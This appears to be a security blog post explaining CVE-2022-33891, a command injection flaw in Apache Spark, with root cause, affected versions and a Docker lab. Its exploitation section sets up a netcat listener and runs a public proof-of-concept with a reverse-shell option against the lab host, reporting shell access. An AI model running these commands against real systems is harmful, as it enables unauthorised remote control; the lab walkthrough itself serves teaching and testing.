Apache Spark Command Injection Vulnerability

March 25, 2024

In the world of cybersecurity, understanding vulnerabilities and how they can be exploited is crucial. One such vulnerability that has caught the attention of security researchers is CVE-2022-33891. This vulnerability exists in Apache Spark, a popular open-source distributed general-purpose cluster-computing framework. In this blog, we will explore the details of this vulnerability, root cause, understand its impact, and discuss how it can be mitigated.

Overview

This vulnerability, discovered in the widely used Apache Spark, a unified analytics engine for large-scale data processing, has raised eyebrows due to its high severity rating and potential for exploitation. The vulnerability stems from a command injection flaw when Access Control Lists (ACLs) are enabled, leading to potential unauthorized access and control.

The vulnerability was reported by Kostya Kortchinsky, a cybersecurity researcher from Databricks3. It is also included in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities Catalog2. The exploitation of this vulnerability could have serious implications. Since Apache Spark is widely used for large-scale data processing, a successful exploit could potentially give an attacker access to sensitive data. Furthermore, the ability to execute arbitrary shell commands could allow an attacker to gain further control over the system.

In the following sections of this blog post, we will explore the technical details of this vulnerability in greater depth. We will look at how the vulnerability can be exploited, the potential impact of an exploit, and the mitigation strategies that can be employed. 

By understanding the intricacies of vulnerabilities like CVE-2022-33891, we can better equip ourselves to protect our systems and data. As the saying goes, knowledge is power. In the realm of cybersecurity, this knowledge can be the difference between a secure system and a potential breach.

Affected Version

This vulnerability affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. It’s important to note that these versions are widely used in many organizations for big data processing and analytics. Therefore, the impact of this vulnerability is significant.

Why CVE-2022-33891 Occurs

Access Control Lists (ACLs) in Apache Spark

Apache Spark provides a feature to enable ACLs via the configuration option spark.acls.enable. This feature is used to check whether a user has access permissions to view or modify the application. When ACLs are enabled, it triggers a specific code path in a component of Apache Spark known as HttpSecurityFilter.

The Role of HttpSecurityFilter

HttpSecurityFilter is a component in Apache Spark that handles HTTP requests and responses. It plays a crucial role in managing security aspects of these requests and responses, including the enforcement of ACLs. When ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. This means that an attacker can pretend to be any user.

The Vulnerability

The vulnerability occurs when a malicious user, after impersonating an arbitrary user, reaches a permission check function. This function builds a Unix shell command based on the user’s input and executes it. The problem here is that the input to this function is not properly sanitized, which means that an attacker can inject arbitrary commands. This results in arbitrary shell command execution as the user Spark is currently running as.

In other words, the attacker can execute any command they want on the system where Apache Spark is running, with the same privileges as the user running the Apache Spark application. This could potentially lead to a full compromise of the system.

Setting Up The Lab

This practical session aims to provide a clear understanding of the exploit, illustrating the potential risks and consequences associated with this identified security flaw. To get started, ensure you have Docker installed on your system. Below is the Docker Compose configuration that you can use to set up the lab environment:


version: '2'
services:
  spark:
    image: docker.io/bitnami/spark:3.1.1
    container_name: CVE-2022-33891
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'

Copy this code into a docker-compose.yml file. Now open a terminal, navigate to the directory containing the file, and run the command: docker-compose up --build . This will pull the required Docker images and set up a local spark instance with the identified vulnerability. After the containers are running, you can access the site by opening http://localhost:8080 or https://IP:80808  in your web browser.

Now, you must configure your Spark application. Access the container shell via: docker exec -it CONTAINER_ID /bin/bash and execute: 

echo "spark.acls.enable true" >> conf/spark-defaults.conf

Once completed, exit the container shell and restart the container using: docker container restart CONTAINER_ID

As a penetration tester, upon discovering the live IP address, the next step would be to conduct a port scan to identify any open ports and services running on the target system. After scanning the IP address, it was found that HTTP service is running on port 8080.

Further investigation revealed that accessing the IP address on port 8080 via a web browser led to the discovery of an Apache Spark application running. The version of the application was identified as 3.1.1.

Fig: Application running on http://192.168.1.235:8080/

Upon researching the version, it was determined that it is vulnerable to CVE-2022-33891, which allows command execution. This vulnerability presents a significant security risk as it could potentially be exploited by attackers to execute arbitrary commands on the target system.

To exploit this vulnerability, we will use a POC created by the Github User HuskyHacks.

Download the POC and install the necessary packages. After installing the required packages, configure your netcat listener(nc -lnv 3000) and execute the POC::python3 poc.py -u http://192.168.1.235 -p 8080 --revshell -lh 192.168.1.2 -lp 3000 --verbose

Fig: Sending the payload with listener ID and Port

Keep in mind that if the server is behind a firewall, obtaining a reverse shell may not be possible. However, if you are fortunate, you will receive a reverse shell. Verify your netcat listener to check for incoming connections. In this case, I have received a connection from the target server which is allowing me to run the system command:

Fig : Connection received and running systems commands

References